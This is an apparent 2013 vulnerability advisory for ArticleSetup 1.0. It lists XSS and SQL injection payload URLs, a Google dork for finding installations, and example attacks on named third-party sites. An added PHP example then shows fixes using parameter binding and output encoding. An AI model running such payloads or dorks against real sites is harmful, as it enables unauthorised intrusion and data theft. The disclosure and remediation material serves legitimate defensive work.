#Exploit Title      : ArticleSetup Multiple Vulnerabilities
#Author         : DevilScreaM
#Date           : 21/09/2013
#Category       : Web Applications
#Vendor         : http://www.articlesetup.com/
#Version        : 1.0
  
#Dork          
intext:Powered By Article Marketing
  
#Vulnerability      : Cross Site Scripting, SQL Injection
#Tested On      : Windows 7, Ubuntu (Mozilla & Chrome)
#Greetz                 : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker
  
  
Cross Site Scripting
  
http://site-target/search.php?s=[XSS]
  
Example
  
http://www.freearticle.com.au/search.php?s=<script>alert('DevilScreaM')</script>
  
  
#XSS on the Admin Page
  
http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>
  
  
===================================================================================
  
SQL Injection Vulnerability
  
http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]
  
Example
  
http://www.frX.au/feed.php?cat=100'
http://www.frX.com.au/search.php?s=123'
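
The fixes these two findings call for, as an added example (not ArticleSetup's code and not from the advisory's author): the feed.php cat value is validated as an integer and bound, and the search.php s term is bound in the query and HTML-encoded on output. The function names, the articles table and its columns, and the in-memory SQLite data are assumptions made for illustration.

```php
<?php
// Added example: hypothetical handlers, not ArticleSetup's source.
// The articles table and its columns (cat_id, title) are assumptions.
declare(strict_types=1);

// feed.php?cat=... : accept only a positive integer, then bind it as one.
function feed_items(PDO $db, string $rawCat): array
{
    $cat = filter_var($rawCat, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($cat === false) {
        return []; // a value such as 100' is rejected before any SQL is built
    }
    $stmt = $db->prepare('SELECT title FROM articles WHERE cat_id = :cat');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// search.php?s=... : the term reaches the query only as a bound parameter.
function search_articles(PDO $db, string $term): array
{
    // Escape LIKE wildcards so % and _ typed by the user match literally.
    $like = '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term) . '%';
    $stmt = $db->prepare("SELECT title FROM articles WHERE title LIKE :q ESCAPE '!'");
    $stmt->execute([':q' => $like]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// HTML-encode anything echoed back into the page (public and admin search).
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (cat_id INTEGER, title TEXT)');
$db->exec("INSERT INTO articles VALUES (100, 'Hello world'), (2, 'Other')");

var_dump(feed_items($db, '100'));   // valid category id
var_dump(feed_items($db, "100'"));  // the quote-suffixed value from the advisory
$s = "<script>alert('x')</script>"; // constructed search term containing markup
var_dump(search_articles($db, $s)); // term is treated as data by the query
echo '<h1>Results for ', h($s), "</h1>\n"; // term is rendered as text
```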
  
====================================================================================
  
Example Target
  